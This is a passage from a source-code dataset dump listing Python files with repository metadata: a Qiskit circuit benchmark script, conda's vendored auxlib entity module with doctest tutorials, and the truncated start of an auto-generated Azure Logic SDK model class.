| column | dtype | values |
|---|---|---|
| hexsha | string | lengths 40–40 |
| size | int64 | 4–1.02M |
| ext | string | 8 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | lengths 4–209 |
| max_stars_repo_name | string | lengths 5–121 |
| max_stars_repo_head_hexsha | string | lengths 40–40 |
| max_stars_repo_licenses | list | lengths 1–10 |
| max_stars_count | int64 | 1–191k ⌀ |
| max_stars_repo_stars_event_min_datetime | string | lengths 24–24 ⌀ |
| max_stars_repo_stars_event_max_datetime | string | lengths 24–24 ⌀ |
| max_issues_repo_path | string | lengths 4–209 |
| max_issues_repo_name | string | lengths 5–121 |
| max_issues_repo_head_hexsha | string | lengths 40–40 |
| max_issues_repo_licenses | list | lengths 1–10 |
| max_issues_count | int64 | 1–67k ⌀ |
| max_issues_repo_issues_event_min_datetime | string | lengths 24–24 ⌀ |
| max_issues_repo_issues_event_max_datetime | string | lengths 24–24 ⌀ |
| max_forks_repo_path | string | lengths 4–209 |
| max_forks_repo_name | string | lengths 5–121 |
| max_forks_repo_head_hexsha | string | lengths 40–40 |
| max_forks_repo_licenses | list | lengths 1–10 |
| max_forks_count | int64 | 1–105k ⌀ |
| max_forks_repo_forks_event_min_datetime | string | lengths 24–24 ⌀ |
| max_forks_repo_forks_event_max_datetime | string | lengths 24–24 ⌀ |
| content | string | lengths 4–1.02M |
| avg_line_length | float64 | 1.07–66.1k |
| max_line_length | int64 | 4–266k |
| alphanum_fraction | float64 | 0.01–1 |
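In the reconstructed schema above, ⌀ marks columns that also contain nulls. The rows that follow dump one source file each: the metadata cells first, then the raw `content`, then the per-file statistics. Assuming a corpus with this layout is published through the Hugging Face `datasets` library (the dataset identifier below is a placeholder, not something named on this page), a minimal sketch of streaming a few rows:

```python
# Minimal sketch: stream rows that follow the schema above.
# The dataset identifier is a placeholder; point it at the real corpus.
from datasets import load_dataset

ds = load_dataset("org/source-code-corpus", split="train", streaming=True)

for row in ds.take(3):
    # Repo metadata plus the raw file content and its statistics.
    print(row["hexsha"], row["ext"], row["max_stars_repo_name"])
    print(row["size"], row["avg_line_length"], row["alphanum_fraction"])
    print(row["content"][:80].replace("\n", "\\n"))
```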
4c35bb436b9ed6741e7fba7e084c65f45d41b764 | 2,585 | py | Python | data/p4VQE/R4/benchmark/startQiskit_Class724.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | ["BSD-3-Clause"] | null | null | null | data/p4VQE/R4/benchmark/startQiskit_Class724.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | ["BSD-3-Clause"] | null | null | null | data/p4VQE/R4/benchmark/startQiskit_Class724.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | ["BSD-3-Clause"] | null | null | null |
# qubit number=3
# total number=15
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
import networkx as nx
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def make_circuit(n:int) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
prog = QuantumCircuit(input_qubit)
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.cx(input_qubit[0],input_qubit[2]) # number=12
prog.x(input_qubit[2]) # number=13
prog.cx(input_qubit[0],input_qubit[2]) # number=14
prog.y(input_qubit[3]) # number=5
for edge in E:
k = edge[0]
l = edge[1]
prog.cp(-2 * gamma, input_qubit[k-1], input_qubit[l-1])
prog.p(gamma, k)
prog.p(gamma, l)
prog.rx(2 * beta, range(len(V)))
prog.swap(input_qubit[1],input_qubit[0]) # number=7
prog.h(input_qubit[1]) # number=11
prog.swap(input_qubit[1],input_qubit[0]) # number=8
prog.y(input_qubit[0]) # number=9
prog.y(input_qubit[0]) # number=10
# circuit end
return prog
if __name__ == '__main__':
n = 4
V = np.arange(0, n, 1)
E = [(0, 1, 1.0), (0, 2, 1.0), (1, 2, 1.0), (3, 2, 1.0), (3, 1, 1.0)]
G = nx.Graph()
G.add_nodes_from(V)
G.add_weighted_edges_from(E)
step_size = 0.1
a_gamma = np.arange(0, np.pi, step_size)
a_beta = np.arange(0, np.pi, step_size)
a_gamma, a_beta = np.meshgrid(a_gamma, a_beta)
F1 = 3 - (np.sin(2 * a_beta) ** 2 * np.sin(2 * a_gamma) ** 2 - 0.5 * np.sin(4 * a_beta) * np.sin(4 * a_gamma)) * (
1 + np.cos(4 * a_gamma) ** 2)
result = np.where(F1 == np.amax(F1))
a = list(zip(result[0], result[1]))[0]
gamma = a[0] * step_size
beta = a[1] * step_size
prog = make_circuit(4)
sample_shot =5600
writefile = open("../data/startQiskit_Class724.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
backend = BasicAer.get_backend('statevector_simulator')
circuit1 = transpile(prog, FakeYorktown())
prog = circuit1
info = execute(prog,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
| 28.097826 | 118 | 0.637524 |
970f6dc0b40c55eebf94bbe221246c99b56d495d | 33,381 | py | Python | conda/_vendor/auxlib/entity.py | peschue/conda | dc25e8c8765c5dfd1f99d697617bc6148224e194 | ["BSD-3-Clause"] | 1 | 2018-12-21T22:11:55.000Z | 2018-12-21T22:11:55.000Z | conda/_vendor/auxlib/entity.py | peschue/conda | dc25e8c8765c5dfd1f99d697617bc6148224e194 | ["BSD-3-Clause"] | null | null | null | conda/_vendor/auxlib/entity.py | peschue/conda | dc25e8c8765c5dfd1f99d697617bc6148224e194 | ["BSD-3-Clause"] | null | null | null |
# -*- coding: utf-8 -*-
"""
This module provides serializable, validatable, type-enforcing domain objects and data
transfer objects. It has many of the same motivations as the python
`Marshmallow <http://marshmallow.readthedocs.org/en/latest/why.html>`_ package. It is most
similar to `Schematics <http://schematics.readthedocs.io/>`_.
========
Tutorial
========
Chapter 1: Entity and Field Basics
----------------------------------
>>> class Color(Enum):
... blue = 0
... black = 1
... red = 2
>>> class Car(Entity):
... weight = NumberField(required=False)
... wheels = IntField(default=4, validation=lambda x: 3 <= x <= 4)
... color = EnumField(Color)
>>> # create a new car object
>>> car = Car(color=Color.blue, weight=4242.46)
>>> car
Car(weight=4242.46, color=0)
>>> # it has 4 wheels, all by default
>>> car.wheels
4
>>> # but a car can't have 5 wheels!
>>> # the `validation=` field is a simple callable that returns a
>>> # boolean based on validity
>>> car.wheels = 5
Traceback (most recent call last):
ValidationError: Invalid value 5 for wheels
>>> # we can call .dump() on car, and just get back a standard
>>> # python dict actually, it's an ordereddict to match attribute
>>> # declaration order
>>> type(car.dump())
<class '...OrderedDict'>
>>> car.dump()
OrderedDict([('weight', 4242.46), ('wheels', 4), ('color', 0)])
>>> # and json too (note the order!)
>>> car.json()
'{"weight": 4242.46, "wheels": 4, "color": 0}'
>>> # green cars aren't allowed
>>> car.color = "green"
Traceback (most recent call last):
ValidationError: 'green' is not a valid Color
>>> # but black cars are!
>>> car.color = "black"
>>> car.color
<Color.black: 1>
>>> # car.color really is an enum, promise
>>> type(car.color)
<enum 'Color'>
>>> # enum assignment can be with any of (and preferentially)
>>> # (1) an enum literal,
>>> # (2) a valid enum value, or
>>> # (3) a valid enum name
>>> car.color = Color.blue; car.color.value
0
>>> car.color = 1; car.color.name
'black'
>>> # let's do a round-trip marshalling of this thing
>>> same_car = Car.from_json(car.json()) # or equally Car.from_json(json.dumps(car.dump()))
>>> same_car == car
True
>>> # actually, they're two different instances
>>> same_car is not car
True
>>> # this works too
>>> cloned_car = Car(**car.dump())
>>> cloned_car == car
True
>>> # while we're at it, these are all equivalent too
>>> car == Car.from_objects(car)
True
>>> car == Car.from_objects({"weight": 4242.46, "wheels": 4, "color": 1})
True
>>> car == Car.from_json('{"weight": 4242.46, "color": 1}')
True
>>> # .from_objects() even lets you stack and combine objects
>>> class DumbClass:
... color = 0
... wheels = 3
>>> Car.from_objects(DumbClass(), dict(weight=2222, color=1))
Car(weight=2222, wheels=3, color=0)
>>> # and also pass kwargs that override properties pulled
>>> # off any objects
>>> Car.from_objects(DumbClass(), {'weight': 2222, 'color': 1}, color=2, weight=33)
Car(weight=33, wheels=3, color=2)
Chapter 2: Entity and Field Composition
---------------------------------------
>>> # now let's get fancy
>>> # a ComposableField "nests" another valid Entity
>>> # a ListField's first argument is a "generic" type,
>>> # which can be a valid Entity, any python primitive
>>> # type, or a list of Entities/types
>>> class Fleet(Entity):
... boss_car = ComposableField(Car)
... cars = ListField(Car)
>>> # here's our fleet of company cars
>>> company_fleet = Fleet(boss_car=Car(color='red'), cars=[car, same_car, cloned_car])
>>> company_fleet.pretty_json() #doctest: +SKIP
{
"boss_car": {
"wheels": 4
"color": 2,
},
"cars": [
{
"weight": 4242.46,
"wheels": 4
"color": 1,
},
{
"weight": 4242.46,
"wheels": 4
"color": 1,
},
{
"weight": 4242.46,
"wheels": 4
"color": 1,
}
]
}
>>> # the boss' car is red of course (and it's still an Enum)
>>> company_fleet.boss_car.color.name
'red'
>>> # and there are three cars left for the employees
>>> len(company_fleet.cars)
3
Chapter 3: Immutability
-----------------------
>>> class ImmutableCar(ImmutableEntity):
... wheels = IntField(default=4, validation=lambda x: 3 <= x <= 4)
... color = EnumField(Color)
>>> icar = ImmutableCar.from_objects({'wheels': 3, 'color': 'blue'})
>>> icar
ImmutableCar(wheels=3, color=0)
>>> icar.wheels = 4
Traceback (most recent call last):
AttributeError: Assignment not allowed. ImmutableCar is immutable.
>>> class FixedWheelCar(Entity):
... wheels = IntField(default=4, immutable=True)
... color = EnumField(Color)
>>> fwcar = FixedWheelCar.from_objects(icar)
>>> fwcar.json()
'{"wheels": 3, "color": 0}'
>>> # repainting the car is easy
>>> fwcar.color = Color.red
>>> fwcar.color.name
'red'
>>> # can't really change the number of wheels though
>>> fwcar.wheels = 18
Traceback (most recent call last):
AttributeError: The wheels field is immutable.
Chapter X: The del and null Weeds
---------------------------------
>>> old_date = lambda: isoparse('1982-02-17')
>>> class CarBattery(Entity):
... # NOTE: default value can be a callable!
... first_charge = DateField(required=False) # default=None, nullable=False
... latest_charge = DateField(default=old_date, nullable=True) # required=True
... expiration = DateField(default=old_date, required=False, nullable=False)
>>> # starting point
>>> battery = CarBattery()
>>> battery
CarBattery()
>>> battery.json()
'{"latest_charge": "1982-02-17T00:00:00", "expiration": "1982-02-17T00:00:00"}'
>>> # first_charge is not assigned a default value. Once one is assigned, it can be deleted,
>>> # but it can't be made null.
>>> battery.first_charge = isoparse('2016-03-23')
>>> battery
CarBattery(first_charge=datetime.datetime(2016, 3, 23, 0, 0))
>>> battery.first_charge = None
Traceback (most recent call last):
ValidationError: Value for first_charge not given or invalid.
>>> del battery.first_charge
>>> battery
CarBattery()
>>> # latest_charge can be null, but it can't be deleted. The default value is a callable.
>>> del battery.latest_charge
Traceback (most recent call last):
AttributeError: The latest_charge field is required and cannot be deleted.
>>> battery.latest_charge = None
>>> battery.json()
'{"latest_charge": null, "expiration": "1982-02-17T00:00:00"}'
>>> # expiration is assigned by default, can't be made null, but can be deleted.
>>> battery.expiration
datetime.datetime(1982, 2, 17, 0, 0)
>>> battery.expiration = None
Traceback (most recent call last):
ValidationError: Value for expiration not given or invalid.
>>> del battery.expiration
>>> battery.json()
'{"latest_charge": null}'
"""
from __future__ import absolute_import, division, print_function
from collections import Mapping, Sequence
from datetime import datetime
from functools import reduce
from json import JSONEncoder, dumps as json_dumps, loads as json_loads
from logging import getLogger
from enum import Enum
from . import NULL
from ._vendor.boltons.timeutils import isoparse
from .collection import AttrDict, frozendict, make_immutable
from .compat import (integer_types, isiterable, iteritems, itervalues, odict, string_types,
text_type, with_metaclass)
from .exceptions import Raise, ValidationError
from .ish import find_or_raise
from .logz import DumpEncoder
from .type_coercion import maybecall
log = getLogger(__name__)
__all__ = [
"Entity", "ImmutableEntity", "Field",
"BooleanField", "BoolField", "IntegerField", "IntField",
"NumberField", "StringField", "DateField",
"EnumField", "ListField", "MapField", "ComposableField",
]
KEY_OVERRIDES_MAP = "__key_overrides__"
NOTES = """
Current deficiencies to schematics:
- no get_mock_object method
- no context-dependent serialization or MultilingualStringType
- name = StringType(serialized_name='person_name', alternate_names=['human_name'])
- name = StringType(serialize_when_none=False)
- more flexible validation error messages
- field validation can depend on other fields
- 'roles' containing blacklists for .dump() and .json()
__roles__ = {
EntityRole.registered_name: Blacklist('field1', 'field2'),
EntityRole.another_registered_name: Whitelist('field3', 'field4'),
}
TODO:
- alternate field names
- add dump_if_null field option
- add help/description parameter to Field
- consider leveraging slots
- collect all validation errors before raising
- Allow returning string error message for validation instead of False
- profile and optimize
- use boltons instead of dateutil
- correctly implement copy and deepcopy on fields and Entity, DictSafeMixin
http://stackoverflow.com/questions/1500718/what-is-the-right-way-to-override-the-copy-deepcopy-operations-on-an-object-in-p
Optional Field Properties:
- validation = None
- default = None
- required = True
- in_dump = True
- nullable = False
Behaviors:
- Nullable is a "hard" setting, in that the value is either always or never allowed to be None.
- What happens then if required=False and nullable=False?
- The object can be init'd without a value (though not with a None value).
getattr throws AttributeError
- Any assignment must be not None.
- Setting a value to None doesn't "unset" a value. (That's what del is for.) And you can't
del a value if required=True, nullable=False, default=None.
- If a field is not required, del does *not* "unmask" the default value. Instead, del
removes the value from the object entirely. To get back the default value, need to recreate
the object. Entity.from_objects(old_object)
- Disabling in_dump is a "hard" setting, in that with it disabled the field will never get
dumped. With it enabled, the field may or may not be dumped depending on its value and other
settings.
- Required is a "hard" setting, in that if True, a valid value or default must be provided. None
is only a valid value or default if nullable is True.
- In general, nullable means that None is a valid value.
- getattr returns None instead of raising Attribute error
- If in_dump, field is given with null value.
- If default is not None, assigning None clears a previous assignment. Future getattrs return
the default value.
- What does nullable mean with default=None and required=True? Does instantiation raise
an error if assignment not made on init? Can IntField(nullable=True) be init'd?
- If required=False and nullable=False, field will only be in dump if field!=None.
Also, getattr raises AttributeError.
- If required=False and nullable=True, field will be in dump if field==None.
- If in_dump is True, does default value get dumped:
- if no assignment, default exists
- if nullable, and assigned None
- How does optional validation work with nullable and assigning None?
- When does gettattr throw AttributeError, and when does it return None?
"""
class Field(object):
"""
Fields are doing something very similar to boxing and unboxing
of c#/java primitives. __set__ should take a "primitive" or "raw" value and create a "boxed"
or "programmatically usable" value of it. While __get__ should return the boxed value,
dump in turn should unbox the value into a primitive or raw value.
Arguments:
types_ (primitive literal or type or sequence of types):
default (any, callable, optional): If default is callable, it's guaranteed to return a
valid value at the time of Entity creation.
required (boolean, optional):
validation (callable, optional):
dump (boolean, optional):
"""
# Used to track order of field declarations. Supporting python 2.7, so can't rely
# on __prepare__. Strategy lifted from http://stackoverflow.com/a/4460034/2127762
_order_helper = 0
def __init__(self, default=NULL, required=True, validation=None,
in_dump=True, default_in_dump=True, nullable=False, immutable=False, aliases=()):
self._required = required
self._validation = validation
self._in_dump = in_dump
self._default_in_dump = default_in_dump
self._nullable = nullable
self._immutable = immutable
self._aliases = aliases
if default is NULL:
self._default = NULL
else:
self._default = default if callable(default) else self.box(None, None, default)
self.validate(None, self.box(None, None, maybecall(default)))
self._order_helper = Field._order_helper
Field._order_helper += 1
@property
def name(self):
try:
return self._name
except AttributeError:
log.error("The name attribute has not been set for this field. "
"Call set_name at class creation time.")
raise
def set_name(self, name):
self._name = name
return self
def __get__(self, instance, instance_type):
try:
if instance is None: # if calling from the class object
val = getattr(instance_type, KEY_OVERRIDES_MAP)[self.name]
else:
val = instance.__dict__[self.name]
except AttributeError:
log.error("The name attribute has not been set for this field.")
raise AttributeError("The name attribute has not been set for this field.")
except KeyError:
if self.default is NULL:
raise AttributeError("A value for {0} has not been set".format(self.name))
else:
val = maybecall(self.default) # default *can* be a callable
if val is None and not self.nullable:
# means the "tricky edge case" was activated in __delete__
raise AttributeError("The {0} field has been deleted.".format(self.name))
return self.unbox(instance, instance_type, val)
def __set__(self, instance, val):
if self.immutable and instance._initd:
raise AttributeError("The {0} field is immutable.".format(self.name))
# validate will raise an exception if invalid
# validate will return False if the value should be removed
instance.__dict__[self.name] = self.validate(instance, self.box(instance, instance.__class__, val))
def __delete__(self, instance):
if self.immutable and instance._initd:
raise AttributeError("The {0} field is immutable.".format(self.name))
elif self.required:
raise AttributeError("The {0} field is required and cannot be deleted."
.format(self.name))
elif not self.nullable:
# tricky edge case
# given a field Field(default='some value', required=False, nullable=False)
# works together with Entity.dump() logic for selecting fields to include in dump
# `if value is not None or field.nullable`
instance.__dict__[self.name] = None
else:
instance.__dict__.pop(self.name, None)
def box(self, instance, instance_type, val):
return val
def unbox(self, instance, instance_type, val):
return val
def dump(self, instance, instance_type, val):
return val
def validate(self, instance, val):
"""
Returns:
True: if val is valid
Raises:
ValidationError
"""
# note here calling, but not assigning; could lead to unexpected behavior
if isinstance(val, self._type) and (self._validation is None or self._validation(val)):
return val
elif val is NULL and not self.required:
return val
elif val is None and self.nullable:
return val
else:
raise ValidationError(getattr(self, 'name', 'undefined name'), val)
@property
def required(self):
return self._required
@property
def type(self):
return self._type
@property
def default(self):
return self._default
@property
def in_dump(self):
return self._in_dump
@property
def default_in_dump(self):
return self._default_in_dump
@property
def nullable(self):
return self.is_nullable
@property
def is_nullable(self):
return self._nullable
@property
def immutable(self):
return self._immutable
class BooleanField(Field):
_type = bool
def box(self, instance, instance_type, val):
return None if val is None else bool(val)
BoolField = BooleanField
class IntegerField(Field):
_type = integer_types
IntField = IntegerField
class NumberField(Field):
_type = integer_types + (float, complex)
class StringField(Field):
_type = string_types
def box(self, instance, instance_type, val):
return text_type(val) if isinstance(val, NumberField._type) else val
class DateField(Field):
_type = datetime
def box(self, instance, instance_type, val):
try:
return isoparse(val) if isinstance(val, string_types) else val
except ValueError as e:
raise ValidationError(val, msg=e)
def dump(self, instance, instance_type, val):
return None if val is None else val.isoformat()
class EnumField(Field):
def __init__(self, enum_class, default=NULL, required=True, validation=None,
in_dump=True, default_in_dump=True, nullable=False, immutable=False, aliases=()):
if not issubclass(enum_class, Enum):
raise ValidationError(None, msg="enum_class must be an instance of Enum")
self._type = enum_class
super(EnumField, self).__init__(default, required, validation,
in_dump, default_in_dump, nullable, immutable, aliases)
def box(self, instance, instance_type, val):
if val is None:
# let the required/nullable logic handle validation for this case
return None
try:
# try to box using val as an Enum value
return self._type(val)
except ValueError as e1:
try:
# try to box using val as an Enum name
return self._type[val]
except KeyError:
raise ValidationError(val, msg=e1)
def dump(self, instance, instance_type, val):
return None if val in (None, NULL) else val.value
class ListField(Field):
_type = tuple
def __init__(self, element_type, default=NULL, required=True, validation=None,
in_dump=True, default_in_dump=True, nullable=False, immutable=False, aliases=()):
self._element_type = element_type
super(ListField, self).__init__(default, required, validation,
in_dump, default_in_dump, nullable, immutable, aliases)
def box(self, instance, instance_type, val):
if val is None:
return None
elif isinstance(val, string_types):
raise ValidationError("Attempted to assign a string to ListField {0}"
"".format(self.name))
elif isiterable(val):
et = self._element_type
if isinstance(et, type) and issubclass(et, Entity):
return self._type(v if isinstance(v, et) else et(**v) for v in val)
else:
return make_immutable(val) if self.immutable else self._type(val)
else:
raise ValidationError(val, msg="Cannot assign a non-iterable value to "
"{0}".format(self.name))
def unbox(self, instance, instance_type, val):
return self._type() if val is None and not self.nullable else val
def dump(self, instance, instance_type, val):
if isinstance(self._element_type, type) and issubclass(self._element_type, Entity):
return self._type(v.dump() for v in val)
else:
return val
def validate(self, instance, val):
val = super(ListField, self).validate(instance, val)
if val:
et = self._element_type
self._type(Raise(ValidationError(self.name, el, et)) for el in val
if not isinstance(el, et))
return val
class MutableListField(ListField):
_type = list
class MapField(Field):
_type = frozendict
def __init__(self, default=NULL, required=True, validation=None,
in_dump=True, default_in_dump=True, nullable=False, immutable=True, aliases=()):
super(MapField, self).__init__(default, required, validation, in_dump, default_in_dump,
nullable, immutable, aliases)
def box(self, instance, instance_type, val):
# TODO: really need to make this recursive to make any lists or maps immutable
if val is None:
return self._type()
elif isiterable(val):
val = make_immutable(val)
if not isinstance(val, Mapping):
raise ValidationError(val, msg="Cannot assign a non-iterable value to "
"{0}".format(self.name))
return val
else:
raise ValidationError(val, msg="Cannot assign a non-iterable value to "
"{0}".format(self.name))
class ComposableField(Field):
def __init__(self, field_class, default=NULL, required=True, validation=None,
in_dump=True, default_in_dump=True, nullable=False, immutable=False, aliases=()):
self._type = field_class
super(ComposableField, self).__init__(default, required, validation,
in_dump, default_in_dump, nullable, immutable,
aliases)
def box(self, instance, instance_type, val):
if val is None:
return None
if isinstance(val, self._type):
return val
else:
# assuming val is a dict now
try:
# if there is a key named 'self', have to rename it
if hasattr(val, 'pop'):
val['slf'] = val.pop('self')
except KeyError:
pass # no key of 'self', so no worries
if isinstance(val, self._type):
return val if isinstance(val, self._type) else self._type(**val)
elif isinstance(val, Mapping):
return self._type(**val)
elif isinstance(val, Sequence) and not isinstance(val, string_types):
return self._type(*val)
else:
return self._type(val)
def dump(self, instance, instance_type, val):
return None if val is None else val.dump()
class EntityType(type):
@staticmethod
def __get_entity_subclasses(bases):
try:
return [base for base in bases if issubclass(base, Entity) and base is not Entity]
except NameError:
# NameError: global name 'Entity' is not defined
return ()
def __new__(mcs, name, bases, dct):
# if we're about to mask a field that's already been created with something that's
# not a field, then assign it to an alternate variable name
non_field_keys = (key for key, value in iteritems(dct)
if not isinstance(value, Field) and not key.startswith('__'))
entity_subclasses = EntityType.__get_entity_subclasses(bases)
if entity_subclasses:
keys_to_override = [key for key in non_field_keys
if any(isinstance(base.__dict__.get(key), Field)
for base in entity_subclasses)]
dct[KEY_OVERRIDES_MAP] = dict((key, dct.pop(key)) for key in keys_to_override)
else:
dct[KEY_OVERRIDES_MAP] = dict()
return super(EntityType, mcs).__new__(mcs, name, bases, dct)
def __init__(cls, name, bases, attr):
super(EntityType, cls).__init__(name, bases, attr)
fields = odict()
_field_sort_key = lambda x: x[1]._order_helper
for clz in reversed(type.mro(cls)):
clz_fields = ((name, field.set_name(name))
for name, field in iteritems(clz.__dict__)
if isinstance(field, Field))
fields.update(sorted(clz_fields, key=_field_sort_key))
cls.__fields__ = frozendict(fields)
if hasattr(cls, '__register__'):
cls.__register__()
def __call__(cls, *args, **kwargs):
instance = super(EntityType, cls).__call__(*args, **kwargs)
setattr(instance, '_{0}__initd'.format(cls.__name__), True)
return instance
@property
def fields(cls):
return cls.__fields__.keys()
@with_metaclass(EntityType)
class Entity(object):
__fields__ = odict()
_lazy_validate = False
def __init__(self, **kwargs):
for key, field in iteritems(self.__fields__):
try:
setattr(self, key, kwargs[key])
except KeyError:
alias = next((ls for ls in field._aliases if ls in kwargs), None)
if alias is not None:
setattr(self, key, kwargs[alias])
elif key in getattr(self, KEY_OVERRIDES_MAP):
# handle the case of fields inherited from a parent class but overridden on the class object
setattr(self, key, getattr(self, KEY_OVERRIDES_MAP)[key])
elif field.required and field.default is NULL:
raise ValidationError(key, msg="{0} requires a {1} field. Instantiated with "
"{2}".format(self.__class__.__name__,
key, kwargs))
except ValidationError:
if kwargs[key] is not None or field.required:
raise
if not self._lazy_validate:
self.validate()
@classmethod
def from_objects(cls, *objects, **override_fields):
init_vars = dict()
search_maps = tuple(AttrDict(o) if isinstance(o, dict) else o
for o in ((override_fields,) + objects))
for key, field in iteritems(cls.__fields__):
try:
init_vars[key] = find_or_raise(key, search_maps, field._aliases)
except AttributeError:
pass
return cls(**init_vars)
@classmethod
def from_json(cls, json_str):
return cls(**json_loads(json_str))
@classmethod
def load(cls, data_dict):
return cls(**data_dict)
def validate(self):
# TODO: here, validate should only have to determine if the required keys are set
try:
reduce(lambda _, name: getattr(self, name),
(name for name, field in iteritems(self.__fields__) if field.required)
)
except TypeError as e:
if str(e) == "reduce() of empty sequence with no initial value":
pass
except AttributeError as e:
raise ValidationError(None, msg=e)
def __repr__(self):
def _valid(key):
# TODO: re-enable once aliases are implemented
# if key.startswith('_'):
# return False
if '__' in key:
return False
try:
getattr(self, key)
return True
except AttributeError:
return False
def _val(key):
val = getattr(self, key)
return repr(val.value) if isinstance(val, Enum) else repr(val)
def _sort_helper(key):
field = self.__fields__.get(key)
return field._order_helper if field is not None else -1
kwarg_str = ", ".join("{0}={1}".format(key, _val(key))
for key in sorted(self.__dict__, key=_sort_helper)
if _valid(key))
return "{0}({1})".format(self.__class__.__name__, kwarg_str)
@classmethod
def __register__(cls):
pass
def json(self, indent=None, separators=None, **kwargs):
return json_dumps(self, indent=indent, separators=separators, cls=DumpEncoder, **kwargs)
def pretty_json(self, indent=2, separators=(',', ': '), **kwargs):
return self.json(indent=indent, separators=separators, **kwargs)
def dump(self):
return odict((field.name, field.dump(self, self.__class__, value))
for field, value in ((field, getattr(self, field.name, NULL))
for field in self.__dump_fields())
if value is not NULL and not (value is field.default
and not field.default_in_dump))
@classmethod
def __dump_fields(cls):
if '__dump_fields_cache' not in cls.__dict__:
cls.__dump_fields_cache = tuple(field for field in itervalues(cls.__fields__)
if field.in_dump)
return cls.__dump_fields_cache
def __eq__(self, other):
if self.__class__ != other.__class__:
return False
rando_default = 19274656290 # need an arbitrary but definite value if field does not exist
return all(getattr(self, field, rando_default) == getattr(other, field, rando_default)
for field in self.__fields__)
def __hash__(self):
return sum(hash(getattr(self, field, None)) for field in self.__fields__)
@property
def _initd(self):
return getattr(self, '_{0}__initd'.format(self.__class__.__name__), None)
class ImmutableEntity(Entity):
def __setattr__(self, attribute, value):
if self._initd:
raise AttributeError("Assignment not allowed. {0} is immutable."
.format(self.__class__.__name__))
super(ImmutableEntity, self).__setattr__(attribute, value)
def __delattr__(self, item):
if self._initd:
raise AttributeError("Deletion not allowed. {0} is immutable."
.format(self.__class__.__name__))
super(ImmutableEntity, self).__delattr__(item)
class DictSafeMixin(object):
def __getitem__(self, item):
return getattr(self, item)
def __setitem__(self, key, value):
setattr(self, key, value)
def __delitem__(self, key):
delattr(self, key)
def get(self, item, default=None):
return getattr(self, item, default)
def __contains__(self, item):
value = getattr(self, item, None)
if value is None:
return False
field = self.__fields__[item]
if isinstance(field, (MapField, ListField)):
return len(value) > 0
return True
def __iter__(self):
for key in self.__fields__:
if key in self:
yield key
def iteritems(self):
for key in self.__fields__:
if key in self:
yield key, getattr(self, key)
def items(self):
return self.iteritems()
def copy(self):
return self.__class__(**self.dump())
def setdefault(self, key, default_value):
if key not in self:
setattr(self, key, default_value)
def update(self, E=None, **F):
# D.update([E, ]**F) -> None. Update D from dict/iterable E and F.
# If E present and has a .keys() method, does: for k in E: D[k] = E[k]
# If E present and lacks .keys() method, does: for (k, v) in E: D[k] = v
# In either case, this is followed by: for k in F: D[k] = F[k]
if E is not None:
if hasattr(E, 'keys'):
for k in E:
self[k] = E[k]
else:
for k, v in iteritems(E):
self[k] = v
for k in F:
self[k] = F[k]
class EntityEncoder(JSONEncoder):
# json.dumps(obj, cls=SetEncoder)
def default(self, obj):
if hasattr(obj, 'dump'):
return obj.dump()
elif hasattr(obj, '__json__'):
return obj.__json__()
elif hasattr(obj, 'to_json'):
return obj.to_json()
elif hasattr(obj, 'as_json'):
return obj.as_json()
elif isinstance(obj, Enum):
return obj.value
return JSONEncoder.default(self, obj)
| 35.473964 | 127 | 0.606093 |
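The entity.py module dumped above builds its Field machinery on Python descriptors plus a metaclass that collects fields in declaration order. A stripped-down sketch of the same descriptor idea, illustrative only (it uses `__set_name__` instead of the metaclass and is not the auxlib API):

```python
# Illustrative typed-descriptor sketch; not the auxlib Field API.
class TypedField:
    def __init__(self, type_, default=None):
        self.type_ = type_
        self.default = default

    def __set_name__(self, owner, name):
        self.name = name  # stands in for auxlib's Field.set_name()

    def __get__(self, obj, objtype=None):
        if obj is None:
            return self
        return obj.__dict__.get(self.name, self.default)

    def __set__(self, obj, value):
        if not isinstance(value, self.type_):
            raise TypeError("{0} expects {1}".format(self.name, self.type_.__name__))
        obj.__dict__[self.name] = value  # "boxing" would happen here

class Car:
    wheels = TypedField(int, default=4)
    weight = TypedField(float, default=0.0)

car = Car()
car.wheels = 3
print(car.wheels, car.weight)   # -> 3 0.0
# car.wheels = "three"          # would raise TypeError
```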
7f20147bc657611bddd1459d20e2a6a5652b7655 | 1,243 | py | Python | sdk/logic/azure-mgmt-logic/azure/mgmt/logic/models/integration_account_partner_filter.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | ["MIT"] | 8 | 2021-01-13T23:44:08.000Z | 2021-03-17T10:13:36.000Z | sdk/logic/azure-mgmt-logic/azure/mgmt/logic/models/integration_account_partner_filter.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | ["MIT"] | 226 | 2019-07-24T07:57:21.000Z | 2019-10-15T01:07:24.000Z | sdk/logic/azure-mgmt-logic/azure/mgmt/logic/models/integration_account_partner_filter.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | ["MIT"] | 2 | 2020-05-21T22:51:22.000Z | 2020-05-26T20:53:01.000Z |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class IntegrationAccountPartnerFilter(Model):
"""The integration account partner filter for odata query.
All required parameters must be populated in order to send to Azure.
:param partner_type: Required. The partner type of integration account
partner. Possible values include: 'NotSpecified', 'B2B'
:type partner_type: str or ~azure.mgmt.logic.models.PartnerType
"""
_validation = {
